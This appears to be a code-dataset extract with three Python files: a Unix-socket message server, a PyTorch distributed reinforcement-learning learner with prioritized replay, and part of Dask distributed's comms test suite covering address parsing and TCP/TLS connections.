source stringlengths 3 86 | python stringlengths 75 1.04M |
|---|---|
multip_thread_rtsp_one_socket_server.py | # coding:utf-8
# Server side
import os
import socket
import threading
import time
# Receiving method
# def clientThreadIn(conn, nick):
# while True:
# try:
# temp = conn.recv(1024)
# if not temp:
# conn.close()
# return
# print("temp len = ", len(temp))
# except:
# conn.close()
# print(nick + 'leaves the room!') # 出现异常就退出
# return
# # 发送的方法
# def clientThreadOut(conn, nick):
# global data
# while True:
# if con.acquire():
# con.wait() # 放弃对资源占有 等待通知
# if data:
# try:
# conn.send(data)
# con.release()
# except:
# con.release()
# return
# def NotifyAll(ss):
# global data
# if con.acquire(): # 获取锁 原子操作
# data = ss
# con.notifyAll() # 当前线程放弃对资源占有, 通知所有
# con.release()
if __name__ == '__main__':
    # Single-client command server over a Unix-domain stream socket.
    sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
    sock_path = './temp/conn'
    # Ensure the parent directory exists, then remove any stale socket file
    # left by a previous run so bind() does not fail.  (The original code
    # created a regular file with os.mknod() and immediately unlinked it,
    # which was a no-op; bind() itself creates the socket file.)
    os.makedirs(os.path.dirname(sock_path), exist_ok=True)
    if os.path.exists(sock_path):
        os.unlink(sock_path)
    sock.bind(sock_path)
    sock.listen(1)
    while True:
        conn, addr = sock.accept()  # accept one client connection
        nick = conn.recv(1024)  # first message from the client is its name
        print('Welcome' + str(nick) + 'to the room')
        while True:
            try:
                time.sleep(2)
                conn.send('start'.encode('utf-8'))
                temp = b''
                while True:
                    temp = conn.recv(1024)
                    if not temp:
                        # recv() returning b'' means the peer closed the
                        # connection.  The original code kept looping forever
                        # here; raise instead so the outer handler cleans up.
                        raise ConnectionError('peer closed connection')
                    print(temp.decode('utf-8'))
                    break
                print("temp len = ", len(temp))
            except (OSError, UnicodeDecodeError):
                # Narrowed from a bare `except:`: socket failures and bad
                # UTF-8 end this client's session; exit on error.
                conn.close()
                print(str(nick) + 'leaves the room!')
                break
|
learner.py | import torch
import torch.utils.data
import torch.optim as optim
import torch.nn as nn
import numpy as np
from collections import deque
import random
import gym
import os
from copy import deepcopy
from time import time, sleep
import torch.multiprocessing as mp
from models import ActorNet, CriticNet
import pickle
from actor import Actor, actor_process
import queue
import visdom
vis = visdom.Visdom()
# Wall-clock timestamp of the previous time_check() call (module import time initially).
ttime = time()
def time_check(num=0):
    """Print seconds elapsed since the last call, tagged with *num*, and reset the timer."""
    global ttime
    print(f'{num} time:{time()-ttime}')
    ttime = time()
class LearnerReplayMemory:
    """Prioritized sequence replay buffer for the learner.

    Each appended item is one episode: (trajectory, per-sequence RNN states,
    per-sequence priorities).  Episodes are sampled proportionally to their
    total priority; within a sampled episode a start index is drawn
    proportionally to per-sequence priority and a window of
    burn_in + learning + n_step steps is returned as (time, batch, ...)
    tensors.
    """
    def __init__(self, memory_sequence_size ,config, dev ):
        self.memory_sequence_size = memory_sequence_size  # max episodes kept
        self.sequence_counter = 0
        self.batch_size = config['batch_size']
        self.memory = deque()            # episode trajectories
        self.recurrent_state = deque()   # RNN states, parallel to memory
        self.priority = deque()          # per-sequence priorities, parallel to memory
        self.total_priority = deque()    # per-episode priority sums, parallel to memory
        self.dev = dev
        self.burn_in_length = config['burn_in_length'] # 40-80
        self.learning_length = config['learning_length']
        self.sequence_length = self.burn_in_length + self.learning_length
        self.n_step = config['n_step']
        # Batch tensor shapes: (time, batch) + per-step feature shape.
        self.obs_shape = (self.sequence_length+self.n_step,self.batch_size)+config['obs_space'][1:]
        self.reward_shape = (self.sequence_length+self.n_step,self.batch_size)+config['reward_space'][1:]
        self.gamma_shape = (self.sequence_length+self.n_step,self.batch_size)+config['gamma_space'][1:]
        self.action_shape = (self.sequence_length+self.n_step,self.batch_size)+config['action_space'][1:]

    def size(self):
        """Number of stored episodes."""
        # return sum([len(self.memory[i]) for i in range(len(self.memory))])
        return len(self.memory)

    def get(self, index):
        """Return the episode trajectory stored at *index*."""
        return self.memory[index]

    def clear(self):
        """Drop all stored episodes and their bookkeeping."""
        self.memory.clear()
        self.recurrent_state.clear()
        self.priority.clear()
        self.total_priority.clear()

    def get_weighted_sample_index(self):
        """Sample batch_size episode indices proportional to total episode priority."""
        total_priority = torch.tensor(self.total_priority).view(-1)
        return torch.utils.data.WeightedRandomSampler(total_priority, self.batch_size, replacement=True)

    def sample(self):
        """Draw a prioritized batch of sequences.

        Returns (episode_indices, sequence_indices, obs, action, reward,
        gamma, actor_state, target_actor_state, critic_state,
        target_critic_state), with trajectory tensors shaped
        (sequence_length + n_step, batch, ...) on self.dev.
        """
        sample_episode_index = self.get_weighted_sample_index()
        sample_episode_index = [index for index in sample_episode_index]
        sample_sequence_index = []
        rnn_state_batch = []
        traj_s = []
        traj_a = []
        traj_r = []
        traj_gam = []
        for episode_index in sample_episode_index:
            episode_trajectory = self.memory[episode_index]
            # Pick the sequence start inside this episode by priority.
            priority = torch.tensor(self.priority[episode_index])
            sequence_index = torch.utils.data.WeightedRandomSampler(priority, 1, replacement = True)
            sequence_index = [index for index in sequence_index]
            sequence_index = sequence_index[0]
            sample_sequence_index.append(sequence_index)
            ss,aa,rr,gg = zip(*(episode_trajectory[sequence_index: sequence_index + self.sequence_length+self.n_step]))
            traj_s.append(torch.cat(ss))
            traj_a.append(torch.cat(aa))
            traj_r.append(torch.cat(rr))
            traj_gam.append(torch.cat(gg))
            episode_rnn_state = self.recurrent_state[episode_index]
            act,tact,cri,tcri = episode_rnn_state[sequence_index]
            rnn_state_batch.append([act,tact,cri,tcri])
        # Reshape to (time, batch, ...) as expected by the learner.
        obs_batch_sequence = torch.stack(traj_s).reshape( self.obs_shape ).to(self.dev)
        action_batch_sequence = torch.stack(traj_a).reshape( self.action_shape ).to(self.dev)
        reward_batch_sequence = torch.stack(traj_r).reshape( self.reward_shape ).to(self.dev)
        gamma_batch_sequence = torch.stack(traj_gam).reshape( self.gamma_shape ).to(self.dev)
        act,tact,cri,tcri = zip(*rnn_state_batch)
        shape2 = (2,self.batch_size,-1)
        actor_state_batch = torch.stack(act).reshape( shape2).to(self.dev)
        target_actor_state_batch = torch.stack(tact).reshape( shape2).to(self.dev)
        critic_state_batch = torch.stack(cri).reshape( shape2).to(self.dev)
        target_critic_state_batch = torch.stack(tcri).reshape( shape2).to(self.dev)
        return sample_episode_index, sample_sequence_index, obs_batch_sequence, action_batch_sequence, reward_batch_sequence, gamma_batch_sequence, \
            actor_state_batch, target_actor_state_batch, critic_state_batch, target_critic_state_batch

    def append(self, data):
        """Store one episode: data = (trajectory, rnn_states, priorities)."""
        self.memory.append(data[0])
        self.recurrent_state.append(data[1])
        self.priority.append(data[2])
        self.total_priority.append(sum(data[2]))
        self.sequence_counter += 1
        while self.sequence_counter > self.memory_sequence_size:
            self.sequence_counter -= 1
            # BUGFIX: the trajectory deque must be trimmed together with the
            # bookkeeping deques.  The original code popped recurrent_state /
            # priority / total_priority but never self.memory, so episode
            # indices sampled from total_priority no longer lined up with
            # self.memory and the buffer grew without bound.
            self.memory.popleft()
            self.recurrent_state.popleft()
            self.priority.popleft()
            self.total_priority.popleft()
def calc_priority(td_loss, eta=0.9):
    """Blend the max and the mean of the TD loss along dim 0 into one priority.

    Higher eta weights the worst-case (max) loss more heavily.
    """
    max_part = td_loss.max(dim=0)[0]
    mean_part = td_loss.mean(dim=0)
    return eta * max_part + (1. - eta) * mean_part
def soft_update(target_model, model, tau):
    """Polyak-average *model*'s parameters into *target_model* in place.

    target <- (1 - tau) * target + tau * source, parameter by parameter.
    """
    pairs = zip(target_model.parameters(), model.parameters())
    for target_param, source_param in pairs:
        blended = target_param.data * (1.0 - tau) + source_param.data * tau
        target_param.data.copy_(blended)
class Learner:
    """Distributed-RL learner (R2D2/D4PG style).

    Pulls episodes from a shared queue into a prioritized sequence replay
    buffer, trains actor/critic networks with burn-in RNN unrolls and n-step
    targets, refreshes sequence priorities, and periodically publishes its
    weights back into shared-memory networks read by the actor processes.
    """
    def __init__(self, learner_id,config,dev,shared_state,shared_queue):
        self.action_size = config['action_space']
        self.obs_size = config['obs_space']
        self.shared_queue = shared_queue
        self.shared_state = shared_state
        self.dev = dev
        self.id = learner_id
        self.burn_in_length = config['burn_in_length'] # 40-80
        self.learning_length = config['learning_length']
        self.sequence_length = self.burn_in_length + self.learning_length
        self.n_step = config['n_step']
        self.sequence = []
        self.recurrent_state = []
        self.priority = []
        self.td_loss = deque(maxlen=self.learning_length)
        self.gamma = config['gamma']
        # self.actor_parameter_update_interval = config['actor_parameter_update_interval']
        self.actor = ActorNet(dev,config).to(self.dev)
        self.target_actor = ActorNet(dev,config).to(self.dev)
        self.critic = CriticNet(dev,config).to(self.dev)
        self.target_critic = CriticNet(dev,config).to(self.dev)
        # Start from the weights the actor processes are currently using.
        self.actor.load_state_dict(self.shared_state["actor"].state_dict())
        self.target_actor.load_state_dict(self.shared_state["target_actor"].state_dict())
        self.critic.load_state_dict(self.shared_state["critic"].state_dict())
        self.target_critic.load_state_dict(self.shared_state["target_critic"].state_dict())
        # self.actor.load_state_dict(self.shared_state["actor"])
        # self.target_actor.load_state_dict(self.shared_state["target_actor"])
        # self.critic.load_state_dict(self.shared_state["critic"])
        # self.target_critic.load_state_dict(self.shared_state["target_critic"])
        self.learner_actor_rate = config['learner_actor_rate']
        # NOTE(review): learner_id doubles as the number of actors whose
        # "update" flags are raised in run() — confirm against callers.
        self.num_actors = learner_id
        self.n_actions = 1
        self.max_frame = config['learner_max_frame']
        self.memory_sequence_size = config['memory_sequence_size']
        self.batch_size = config['batch_size']
        self.memory = LearnerReplayMemory(self.memory_sequence_size, config, dev)
        self.model_path = './'
        # self.memory_path = './memory_data/'
        # self.model_save_interval = 10 # 50
        self.learner_parameter_update_interval = config['learner_parameter_update_interval'] # 50
        self.target_update_inverval = config['target_update_interval'] # 100
        self.gamma = config['gamma']
        self.actor_lr = config['actor_lr']
        self.critic_lr = config['critic_lr']
        self.actor_optimizer = optim.Adam(self.actor.parameters(), lr=self.actor_lr)
        self.actor_criterion = nn.MSELoss()
        self.critic_optimizer = optim.Adam(self.critic.parameters(), lr=self.critic_lr)
        self.critic_criterion = nn.MSELoss()

    def __del__(self):
        # Best-effort IPC cleanup on teardown.
        self.shared_queue.close()
        self.shared_state.close()
        # self.save_model()

    def save_model(self):
        """Snapshot all four networks into a single checkpoint file."""
        model_dict = {'actor': self.actor.state_dict(),
                      'target_actor': self.target_actor.state_dict(),
                      'critic': self.critic.state_dict(),
                      'target_critic': self.target_critic.state_dict()}
        torch.save(model_dict, self.model_path + 'model.pt')

    def update_target_model(self):
        """Hard-copy online network weights into the target networks."""
        self.target_actor.load_state_dict(self.actor.state_dict())
        self.target_critic.load_state_dict(self.critic.state_dict())

    def run(self):
        """Training loop: fill replay to one batch, then repeatedly sample,
        update critic and actor, refresh priorities, and publish weights."""
        time_check(-1)
        # Block until the replay buffer holds at least one batch of episodes.
        while self.memory.size() < self.batch_size :
            self.memory.append(self.shared_queue.get(block=True))
            # self.memory.append(self.shared_queue.get())
            print('\rmem size: ',self.memory.size(),end='\r')
        time_check(1)
        count_mem=0
        frame = 0
        # visdom line plots for critic (V) and actor (P) losses.
        win_v = vis.line(Y=torch.Tensor([0]), opts=dict(title ='V_loss'))
        win_p = vis.line(Y=torch.Tensor([0]), opts=dict(title ='P_loss'))
        while frame < self.max_frame:
            # sleep(0.0001)
            # if self.shared_queue.qsize()==0 and count_mem <0:
            #     self.memory.append(self.shared_queue.get(block=True))
            #
            # for i in range(self.shared_queue.qsize()):
            #     self.memory.append(self.shared_queue.get(block=False))
            #     count_mem += self.learner_actor_rate
            #     print('waiting shared q {}/{}'.format(self.memory.size(),self.batch_size))
            # self.shared_state['frame'][self.id]=frame
            # while self.shared_state['sleep'][self.id] :
            #     sleep(0.5)
            # if self.shared_queue.qsize()==0 and count_mem <0:
            #     self.memory.append(self.shared_queue.get(block=True))
            #     self.memory.append(self.shared_queue.get())
            # for i in range(self.shared_queue.qsize()):
            ##     global_buf.append(self.shared_queue.get())
            #     self.memory.append(self.shared_queue.get())
            #     count_mem += self.learner_actor_rate
            # Drain one freshly-collected episode from the actors, if any.
            if self.shared_queue.qsize()!=0:
                self.memory.append(self.shared_queue.get(block=True))
            frame+=1
            count_mem -= 1
            episode_index, sequence_index, obs_seq, action_seq, reward_seq, gamma_seq, a_state, ta_state, c_state, tc_state = self.memory.sample()
            # Restore the stored RNN hidden states for the sampled sequences.
            self.actor.set_state(a_state[0], a_state[1])
            self.target_actor.set_state(ta_state[0], ta_state[1])
            self.critic.set_state(c_state[0], c_state[1])
            self.target_critic.set_state(tc_state[0], tc_state[1])
            ### burn-in step ###
            # Unroll networks over the burn-in prefix purely to warm up the
            # recurrent state; outputs are discarded.
            _ = [self.actor(obs_seq[i]) for i in range(self.burn_in_length)]
            _ = [self.critic(obs_seq[i],action_seq[i]) for i in range(self.burn_in_length)]
            _ = [self.target_actor(obs_seq[i]) for i in range(self.burn_in_length+self.n_step)]
            _ = [self.target_critic(obs_seq[i],action_seq[i]) for i in range(self.burn_in_length+self.n_step)]
            ### learning steps ###
            # update ciritic: n-step TD targets from the target networks.
            q_value = torch.zeros(self.learning_length * self.batch_size, self.n_actions)
            target_q_value = torch.zeros(self.learning_length * self.batch_size, self.n_actions)
            for i in range(self.learning_length):
                obs_i = self.burn_in_length + i
                next_obs_i = self.burn_in_length + i + self.n_step
                q_value[i*self.batch_size: (i+1)*self.batch_size] = self.critic(obs_seq[obs_i], action_seq[obs_i])
                with torch.no_grad():
                    next_q_value = self.target_critic(obs_seq[next_obs_i], self.target_actor(obs_seq[next_obs_i]))
                target_q_val = reward_seq[obs_i] + (gamma_seq[next_obs_i]** self.n_step) * next_q_value
                # target_q_val = invertical_vf(target_q_val)
                target_q_value[i*self.batch_size: (i+1)*self.batch_size] = target_q_val
            critic_loss = self.actor_criterion(q_value, target_q_value.detach())
            self.critic_optimizer.zero_grad()
            critic_loss.backward()
            self.critic_optimizer.step()
            # update actor: deterministic policy gradient (maximize Q).
            self.actor.reset_state()
            self.critic.reset_state()
            actor_loss = torch.zeros(self.learning_length * self.batch_size, self.n_actions).to(self.dev)
            for i in range(self.learning_length):
                obs_i = i + self.burn_in_length
                action = self.actor(obs_seq[obs_i])
                actor_loss[i*self.batch_size: (i+1)*self.batch_size] = -self.critic(obs_seq[obs_i], self.actor(obs_seq[obs_i]))
            actor_loss = actor_loss.mean()
            self.actor_optimizer.zero_grad()
            actor_loss.backward()
            self.actor_optimizer.step()
            # update target networks (hard copy every N frames)
            if frame % self.target_update_inverval == 0:
                self.update_target_model()
            print('#',frame,'critic_loss:',critic_loss.item(),' actor_loss:',actor_loss.item() ,' count:',count_mem)
            win_p = vis.line(X=torch.Tensor([frame]), Y=torch.Tensor([actor_loss.item()]), win= win_p , update ='append')
            win_v = vis.line(X=torch.Tensor([frame]), Y=torch.Tensor([critic_loss.item()]), win= win_v , update ='append')
            # calc priority: write fresh TD errors back into the replay buffer.
            average_td_loss = ((q_value - target_q_value)**2).detach().to(self.dev)
            # average_td_loss = np.mean(((q_value - target_q_value)**2).detach().cpu().numpy() , axis = 1)
            for i in range(len(episode_index)):
                td = average_td_loss[i: -1: self.batch_size]
                self.memory.priority[episode_index[i]][sequence_index[i]] = calc_priority(td).cpu().view(1,-1)
                self.memory.total_priority[episode_index[i]] = torch.cat(self.memory.priority[episode_index[i]]).sum(0).view(1,-1)
                # self.memory.priority[episode_index[i]][sequence_index[i]] = calc_priority(td)
                # self.memory.total_priority[episode_index[i]] = sum(self.memory.priority[episode_index[i]])
            # if frame % self.model_save_interval == 0:
            #     self.save_model()
            # Periodically publish current weights to the shared networks and
            # flag every actor to reload them.
            if frame % self.learner_parameter_update_interval == 0:
                # print('learner update ')
                # [self.shared_state["actor"][k] = v.cpu() for k,v in self.actor.state_dict().item() ]
                # [self.shared_state["target_actor"][k] = v.cpu() for k,v in self.target_actor.state_dict().item() ]
                # [self.shared_state["critic"][k] = v.cpu() for k,v in self.critic.state_dict().item() ]
                # [self.shared_state["target_critic"][k] = v.cpu() for k,v in self.target_critic.state_dict().item() ]
                #
                # for k,v in self.actor.state_dict().items():
                #     self.shared_state["actor"][k] = v.cpu()
                # for k,v in self.target_actor.state_dict().items():
                #     self.shared_state["target_actor"][k] = v.cpu()
                # for k,v in self.critic.state_dict().items():
                #     self.shared_state["critic"][k] = v.cpu()
                # for k,v in self.target_critic.state_dict().items():
                #     self.shared_state["target_critic"][k] = v.cpu()
                # self.shared_state["actor"] = self.actor.state_dict()
                # self.shared_state["target_actor"] = self.target_actor.state_dict()
                # self.shared_state["critic"] = self.critic.state_dict()
                # self.shared_state["target_critic"] = self.target_critic.state_dict()
                self.shared_state["actor"].load_state_dict(self.actor.state_dict())
                self.shared_state["critic"].load_state_dict(self.critic.state_dict())
                self.shared_state["target_actor"].load_state_dict(self.target_actor.state_dict())
                self.shared_state["target_critic"].load_state_dict(self.target_critic.state_dict())
                for i in range(self.num_actors):
                    self.shared_state["update"][i]=True
                print('learner_update',self.actor.policy_l0.weight.data[0][0])
            # Drop RNN state before the next sampled batch.
            self.actor.reset_state()
            self.target_actor.reset_state()
            self.critic.reset_state()
            self.target_critic.reset_state()
def learner_process(lid,config,dev_cpu,shared_state,shared_queue):
    """Process entry point: build a Learner and run its training loop to completion."""
    learner = Learner(lid,config,dev_cpu,shared_state,shared_queue)
    learner.run()
from actor import Actor, actor_process
import queue
if __name__ == '__main__':
    # Experiment configuration shared by the actor and learner processes.
    config = {
        'game_name':'CartPole-v0',
        # cartpole state space 1,4
        # 'obs_space':(1,4),
        # 'reward_space':(1,1),
        # 'gamma_space':(1,1),
        # 'num_envs':1,
        # 'use_cnn':False,
        # 'action_argmax':True,
        'obs_space':(1,3,84,84),
        'reward_space':(1,1),
        'gamma_space':(1,1),
        'action_space':(1,2),
        'num_envs':1,
        'use_cnn':True,
        'action_argmax':True,
        'get_img_from_render':True,
        #
        # 'game_name':'Pendulum-v0',
        # 'action_space':1,
        # 'obs_space':(1,3),
        'burn_in_length':3,
        'learning_length':6,
        'n_step':3,
        'memory_sequence_size':500,
        # 'actor_parameter_update_interval':2000,
        'learner_parameter_update_interval':100,
        'actor_lr':1e-4,
        'critic_lr':1e-3,
        'gamma':0.997,
        'actor_max_frame':100,
        'learner_max_frame':10,
        'batch_size':5,
        'num_processes':1,
        'learner_actor_rate':20,
        'target_update_interval':30,
        'max_shared_q_size':50,
    }
    num_processes = config['num_processes']
    use_cuda = torch.cuda.is_available()
    dev_cpu = torch.device('cpu')
    dev_gpu = torch.device('cuda' if use_cuda else 'cpu')
    # manager = mp.Manager()
    # shared_state = manager.dict()
    # shared_queue = manager.Queue()
    shared_queue = mp.Queue()
    # shared_queue = queue.Queue()
    shared_state = dict()
    # Networks placed in shared memory so actor processes can read learner updates.
    shared_state["actor"] = ActorNet(dev_cpu,config).share_memory()
    shared_state["critic"] = CriticNet(dev_cpu,config).share_memory()
    shared_state["target_actor"] = ActorNet(dev_cpu,config).share_memory()
    shared_state["target_critic"] = CriticNet(dev_cpu,config).share_memory()
    # shared_state["frame"] = mp.Array('i', [0 for i in range(num_processes)])
    # shared_state["sleep"] = mp.Array('i', [0 for i in range(num_processes)])
    # Per-actor flag the learner sets when new weights are published.
    shared_state["update"] = mp.Array('i', [0 for i in range(num_processes)])
    # shared_state["actor"] = ActorNet(config['obs_space'], config['action_space'],dev_cpu)
    # shared_state["critic"] = CriticNet(config['obs_space'], config['action_space'],dev_cpu)
    # shared_state["target_actor"] = ActorNet(config['obs_space'], config['action_space'],dev_cpu)
    # shared_state["target_critic"] = CriticNet(config['obs_space'], config['action_space'],dev_cpu)
    # shared_state["frame"] = [0 for i in range(num_processes)]
    # shared_state["sleep"] = [0 for i in range(num_processes)]
    # shared_state["update"]=False
    #
    proc_list = []
    # proc_list.append(mp.Process(target=learner_process, args=(num_processes, config,dev_gpu,shared_state,shared_queue)))
    # eps = [0.05,0.6,0.4,0.3,0.2,0.6,0.4,0.6,0.2,0.4]
    # for i in range(num_processes):
    #     proc_list.append( mp.Process(target=actor_process, args=(i,config,dev_gpu,shared_state,shared_queue,eps[i])) )
    # for proc in proc_list:
    #     proc.start()
    try:
        # Run actor and learner sequentially in this process (the
        # multiprocessing variant above is commented out).
        for i in range(10):
            actor_process(0,config,dev_cpu,shared_state,shared_queue,0.3)
            # actor_process(1,config,dev_cpu,shared_state,shared_queue,0.3)
            # actor_process(2,config,dev_cpu,shared_state,shared_queue,0.3)
            learner_process(3,config,dev_cpu,shared_state,shared_queue)
        # for proc in proc_list:
        #     proc.join()
    except:
        # NOTE(review): bare except also catches KeyboardInterrupt — presumably
        # intentional so Ctrl-C runs this cleanup path; confirm.
        print('qclose')
        shared_queue.close()
        # print('shared_state close')
        # shared_state["update"].close()
        # for key in shared_state.keys():
        #     shared_state[key].close()
        print('process close')
        for proc in proc_list:
            proc.terminate()
        shared_queue.join_thread()
        # shared_state["update"].join_thread()
        # for key in shared_state.keys():
        #     shared_state[key].join_thread()
    # shared_state.close()
    # shared_queue.close()
|
test_comms.py | import asyncio
import os
import sys
import threading
import types
import warnings
from functools import partial
import pkg_resources
import pytest
from tornado import ioloop
from tornado.concurrent import Future
import dask
import distributed
from distributed.comm import (
CommClosedError,
connect,
get_address_host,
get_local_address_for,
inproc,
listen,
parse_address,
parse_host_port,
resolve_address,
tcp,
unparse_host_port,
)
from distributed.comm.registry import backends, get_backend
from distributed.comm.tcp import TCP, TCPBackend, TCPConnector
from distributed.compatibility import WINDOWS
from distributed.metrics import time
from distributed.protocol import Serialized, deserialize, serialize, to_serialize
from distributed.utils import get_ip, get_ipv6
from distributed.utils_test import (
get_cert,
get_client_ssl_context,
get_server_ssl_context,
has_ipv6,
requires_ipv6,
)
# Externally-visible addresses of this host, used to check contact addresses.
EXTERNAL_IP4 = get_ip()
if has_ipv6():
    with warnings.catch_warnings(record=True):
        warnings.simplefilter("always")
        EXTERNAL_IP6 = get_ipv6()

ca_file = get_cert("tls-ca-cert.pem")

# The Subject field of our test certs
cert_subject = (
    (("countryName", "XY"),),
    (("localityName", "Dask-distributed"),),
    (("organizationName", "Dask"),),
    (("commonName", "localhost"),),
)
def check_tls_extra(info):
    """Assert that a TLS comm's extra_info dict matches our test certificate
    and reports a sane cipher suite."""
    assert isinstance(info, dict)
    assert info["peercert"]["subject"] == cert_subject
    assert "cipher" in info
    cipher_name, proto_name, secret_bits = info["cipher"]
    # Most likely
    assert "AES" in cipher_name
    assert "TLS" in proto_name
    assert secret_bits >= 128
# Keyword arguments that wire the test SSL contexts into listen()/connect().
tls_kwargs = dict(
    listen_args={"ssl_context": get_server_ssl_context()},
    connect_args={"ssl_context": get_client_ssl_context()},
)
async def get_comm_pair(listen_addr, listen_args=None, connect_args=None, **kwargs):
    """Open a listener on *listen_addr*, connect a client to it, and return
    the (client_comm, server_comm) pair.

    Note: the stray ``@pytest.mark.asyncio`` decorator was removed — this is a
    helper awaited by tests, not a test itself, so the marker had no effect.
    Mutable default arguments were also replaced with None sentinels.
    """
    listen_args = listen_args or {}
    connect_args = connect_args or {}
    q = asyncio.Queue()

    async def handle_comm(comm):
        await q.put(comm)

    listener = await listen(listen_addr, handle_comm, **listen_args, **kwargs)
    comm = await connect(listener.contact_address, **connect_args, **kwargs)
    serv_comm = await q.get()
    return (comm, serv_comm)
def get_tcp_comm_pair(**kwargs):
    """Return a coroutine yielding a connected (client, server) TCP comm pair."""
    return get_comm_pair("tcp://", **kwargs)
def get_tls_comm_pair(**kwargs):
    """Return a coroutine yielding a connected (client, server) TLS comm pair,
    injecting the module-level test SSL contexts."""
    kwargs.update(tls_kwargs)
    return get_comm_pair("tls://", **kwargs)
def get_inproc_comm_pair(**kwargs):
    """Return a coroutine yielding a connected (client, server) in-process comm pair."""
    return get_comm_pair("inproc://", **kwargs)
async def debug_loop():
    """
    Debug helper
    """
    # Prints the current IOLoop and its registered handlers twice a second.
    # Relies on the private Tornado attribute `_handlers`; never terminates.
    while True:
        loop = ioloop.IOLoop.current()
        print(".", loop, loop._handlers)
        await asyncio.sleep(0.50)
#
# Test utility functions
#
def test_parse_host_port():
    """parse_host_port: valid host[:port] forms parse; missing ports and
    unbracketed IPv6 literals raise ValueError."""
    f = parse_host_port
    valid_cases = [
        (("localhost:123",), ("localhost", 123)),
        (("127.0.0.1:456",), ("127.0.0.1", 456)),
        (("localhost:123", 80), ("localhost", 123)),  # explicit port wins
        (("localhost", 80), ("localhost", 80)),
        (("[::1]:123",), ("::1", 123)),
        (("[fe80::1]:123", 80), ("fe80::1", 123)),
        (("[::1]", 80), ("::1", 80)),
    ]
    for args, expected in valid_cases:
        assert f(*args) == expected
    invalid_inputs = ["localhost", "[::1]", "::1:123", "::1"]
    for bad in invalid_inputs:
        with pytest.raises(ValueError):
            f(bad)
def test_unparse_host_port():
    """unparse_host_port joins host and port, bracketing IPv6 hosts and
    omitting a missing/None port."""
    cases = [
        (("localhost", 123), "localhost:123"),
        (("127.0.0.1", 123), "127.0.0.1:123"),
        (("::1", 123), "[::1]:123"),
        (("[::1]", 123), "[::1]:123"),
        (("127.0.0.1",), "127.0.0.1"),
        (("127.0.0.1", None), "127.0.0.1"),
        (("127.0.0.1", "*"), "127.0.0.1:*"),
        (("::1",), "[::1]"),
        (("[::1]",), "[::1]"),
        (("::1", "*"), "[::1]:*"),
    ]
    for args, expected in cases:
        assert unparse_host_port(*args) == expected
def test_get_address_host():
    """get_address_host extracts the host component of a comm address."""
    assert get_address_host("tcp://127.0.0.1:123") == "127.0.0.1"
    local_ip = get_ip()
    inproc_addr = "inproc://%s/%d/123" % (local_ip, os.getpid())
    assert get_address_host(inproc_addr) == local_ip
def test_resolve_address():
    """resolve_address normalizes addresses to fully-qualified scheme://host:port URIs."""
    f = resolve_address
    tcp_cases = [
        ("tcp://127.0.0.1:123", "tcp://127.0.0.1:123"),
        ("127.0.0.2:789", "tcp://127.0.0.2:789"),  # default scheme is tcp
        ("tcp://0.0.0.0:456", "tcp://0.0.0.0:456"),
    ]
    for addr, expected in tcp_cases:
        assert f(addr) == expected
    if has_ipv6():
        assert f("tcp://[::1]:123") == "tcp://[::1]:123"
        assert f("tls://[::1]:123") == "tls://[::1]:123"
        # OS X returns '::0.0.0.2' as canonical representation
        assert f("[::2]:789") in ("tcp://[::2]:789", "tcp://[::0.0.0.2]:789")
        assert f("tcp://[::]:123") == "tcp://[::]:123"
    # Hostnames resolve to loopback, preserving the scheme.
    assert f("localhost:123") == "tcp://127.0.0.1:123"
    assert f("tcp://localhost:456") == "tcp://127.0.0.1:456"
    assert f("tls://localhost:456") == "tls://127.0.0.1:456"
def test_get_local_address_for():
    """get_local_address_for picks a local address able to reach the given peer."""
    f = get_local_address_for
    assert f("tcp://127.0.0.1:80") == "tcp://127.0.0.1"
    assert f("tcp://8.8.8.8:4444") == "tcp://" + get_ip()
    if has_ipv6():
        assert f("tcp://[::1]:123") == "tcp://[::1]"
    inproc_arg = "inproc://%s/%d/444" % (get_ip(), os.getpid())
    inproc_res = f(inproc_arg)
    # inproc yields a fresh local address, never echoing the peer's own.
    assert inproc_res.startswith("inproc://")
    assert inproc_res != inproc_arg
#
# Test concrete transport APIs
#
@pytest.mark.asyncio
async def test_tcp_listener_does_not_call_handler_on_handshake_error():
    """A raw TCP client that never completes the comm handshake must not
    trigger the listener's comm handler."""
    handle_comm_called = False

    async def handle_comm(comm):
        nonlocal handle_comm_called
        handle_comm_called = True

    with dask.config.set({"distributed.comm.timeouts.connect": 0.01}):
        listener = await tcp.TCPListener("127.0.0.1", handle_comm)
    host, port = listener.get_host_port()
    # connect without handshake:
    reader, writer = await asyncio.open_connection(host=host, port=port)
    # wait a bit to let the listener side hit the timeout on the handshake:
    await asyncio.sleep(0.02)
    assert not handle_comm_called
    writer.close()
    await writer.wait_closed()
@pytest.mark.asyncio
async def test_tcp_specific():
    """
    Test concrete TCP API.
    """

    async def handle_comm(comm):
        # Server side: echo the message back with op flipped to "pong".
        assert comm.peer_address.startswith("tcp://" + host)
        assert comm.extra_info == {}
        msg = await comm.read()
        msg["op"] = "pong"
        await comm.write(msg)
        await comm.close()

    listener = await tcp.TCPListener("127.0.0.1", handle_comm)
    host, port = listener.get_host_port()
    assert host in ("localhost", "127.0.0.1", "::1")
    assert port > 0
    l = []

    async def client_communicate(key, delay=0):
        addr = "%s:%d" % (host, port)
        comm = await connect(listener.contact_address)
        assert comm.peer_address == "tcp://" + addr
        assert comm.extra_info == {}
        await comm.write({"op": "ping", "data": key})
        if delay:
            await asyncio.sleep(delay)
        msg = await comm.read()
        assert msg == {"op": "pong", "data": key}
        l.append(key)
        await comm.close()

    await client_communicate(key=1234)
    # Many clients at once
    N = 100
    futures = [client_communicate(key=i, delay=0.05) for i in range(N)]
    await asyncio.gather(*futures)
    assert set(l) == {1234} | set(range(N))
@pytest.mark.asyncio
async def test_tls_specific():
    """
    Test concrete TLS API.
    """

    async def handle_comm(comm):
        # Server side: validate TLS handshake info, then echo with op "pong".
        assert comm.peer_address.startswith("tls://" + host)
        check_tls_extra(comm.extra_info)
        msg = await comm.read()
        msg["op"] = "pong"
        await comm.write(msg)
        await comm.close()

    server_ctx = get_server_ssl_context()
    client_ctx = get_client_ssl_context()
    listener = await tcp.TLSListener("127.0.0.1", handle_comm, ssl_context=server_ctx)
    host, port = listener.get_host_port()
    assert host in ("localhost", "127.0.0.1", "::1")
    assert port > 0
    l = []

    async def client_communicate(key, delay=0):
        addr = "%s:%d" % (host, port)
        comm = await connect(listener.contact_address, ssl_context=client_ctx)
        assert comm.peer_address == "tls://" + addr
        check_tls_extra(comm.extra_info)
        await comm.write({"op": "ping", "data": key})
        if delay:
            await asyncio.sleep(delay)
        msg = await comm.read()
